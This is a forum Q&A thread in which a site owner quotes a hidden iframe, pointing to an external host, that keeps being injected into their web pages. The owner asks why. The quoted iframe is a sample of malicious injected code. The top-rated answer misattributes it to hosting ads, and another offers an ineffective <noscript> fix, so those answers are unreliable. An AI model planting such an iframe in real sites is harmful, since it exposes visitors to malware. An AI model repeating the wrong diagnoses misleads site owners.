iframe automatically get added to index page of my web site?

Hello friends,

from last 8-10 day an i frame of following type

<iframe src="http://c5y.at:8080/ts/in.cgi?pepsi135" width=125 height=125 style="visibility: hidden"></iframe>

this type of iframe automatically get added to my web site index page, this happens to my most of the web sites and also index pages of subfolders. even i remove this code it get added after 2-3 days.

can any one tell me what should be the problem.

My Quick heal not showing it as virus.

can any one tell me the solution for this.

Favorite Answer

I think you are using a free host.... then this will happen, because they will place ads on your page like this.

if you are using a free hosting service, nothing can be done to stop this. register your domain... it wil be around $10 a year...

Dont forget my 10points..

• Astano

If you are using a web host it could be an ad automatically added to the page, however if this appears on your computer then it's a virus! To remove the ad, assuming it's the last thing on the page write <noscript> this should remove it :)

That is a virus. A malicious user added this to your site's files without your consent. Your website has been compromised. Do not go to the website that is being linked to unless you know a lot about computer security or you could be infected as well.